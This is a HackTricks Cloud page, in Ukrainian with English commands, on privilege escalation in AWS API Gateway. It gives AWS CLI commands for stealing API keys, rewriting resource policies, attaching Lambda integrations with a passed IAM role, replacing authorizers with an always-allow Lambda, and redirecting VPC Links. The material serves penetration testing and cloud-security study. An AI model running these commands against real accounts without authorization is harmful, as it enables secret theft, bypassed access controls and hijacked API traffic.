AWS - Apigateway Privesc

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Перегляньте the subscription plans!

Приєднуйтесь до 💬 Discord group або до telegram group або стежте за нами в Twitter 🐦 @hacktricks_live.

Діліться hacking tricks, надсилаючи PRs до HackTricks та HackTricks Cloud github repos.

Apigateway

Для отримання додаткової інформації див.:

AWS - API Gateway Enum

`apigateway:POST`

Маючи цей дозвіл, ви можете створювати API keys для налаштованих APIs (для кожного регіону).

aws --region <region> apigateway create-api-key

Потенційний вплив: Ви не можете виконати privesc за допомогою цієї техніки, але можете отримати доступ до чутливої інформації.

`apigateway:GET`

Маючи цей дозвіл, ви можете отримати згенеровані API-ключі налаштованих API (по регіонах).

aws --region <region> apigateway get-api-keys
aws --region <region> apigateway get-api-key --api-key <key> --include-value

Potential Impact: Ви не зможете виконати privesc за допомогою цієї техніки, але можете отримати доступ до конфіденційної інформації.

`apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`

Маючи ці дозволи, можна змінити resource policy для API, щоб надати собі доступ для його виклику і зловживати потенційним доступом, який має API gateway (наприклад, викликати вразливу lambda).

aws apigateway update-rest-api \
--rest-api-id api-id \
--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'

Потенційний вплив: Зазвичай ви не зможете виконати privesc безпосередньо за допомогою цієї техніки, але можете отримати доступ до конфіденційної інформації.

Note

Потрібне тестування

attacker з дозволами apigateway:PutIntegration, apigateway:CreateDeployment, та iam:PassRole може додати нову інтеграцію до існуючого API Gateway REST API з Lambda function, до якої прикріплено IAM role. Потім attacker може запустити Lambda function для виконання довільного коду і потенційно отримати доступ до ресурсів, пов’язаних із цією IAM role.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new integration to the API Gateway REST API
aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Доступ до ресурсів, пов’язаних з IAM role Lambda-функції.

`apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`

Note

Потребує тестування

Зловмисник, який має дозволи apigateway:UpdateAuthorizer та apigateway:CreateDeployment, може змінити існуючий API Gateway authorizer щоб обійти перевірки безпеки (наприклад, перенаправити його на Lambda, яка завжди повертає “allow”) або виконувати довільний код під час обробки API-запитів.

API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Update the API Gateway authorizer
aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Обхід перевірок безпеки, несанкціонований доступ до ресурсів API.

HTTP APIs / `apigatewayv2` варіант

Для HTTP APIs (API Gateway v2), еквівалентною операцією є оновлення authorizer через apigatewayv2:

REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"

`apigateway:UpdateVpcLink`

Note

Потребує перевірки

Зловмисник з дозволом apigateway:UpdateVpcLink може змінити існуючий VPC Link так, щоб він вказував на інший Network Load Balancer, потенційно перенаправляючи приватний трафік API на несанкціоновані або зловмисні ресурси.

VPC_LINK_ID="your-vpc-link-id"
NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"

# Update the VPC Link
aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"

Potential Impact: Несанкціонований доступ до приватних API-ресурсів, перехоплення або порушення API-трафіку.

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Перегляньте the subscription plans!

Приєднуйтесь до 💬 Discord group або до telegram group або стежте за нами в Twitter 🐦 @hacktricks_live.

Діліться hacking tricks, надсилаючи PRs до HackTricks та HackTricks Cloud github repos.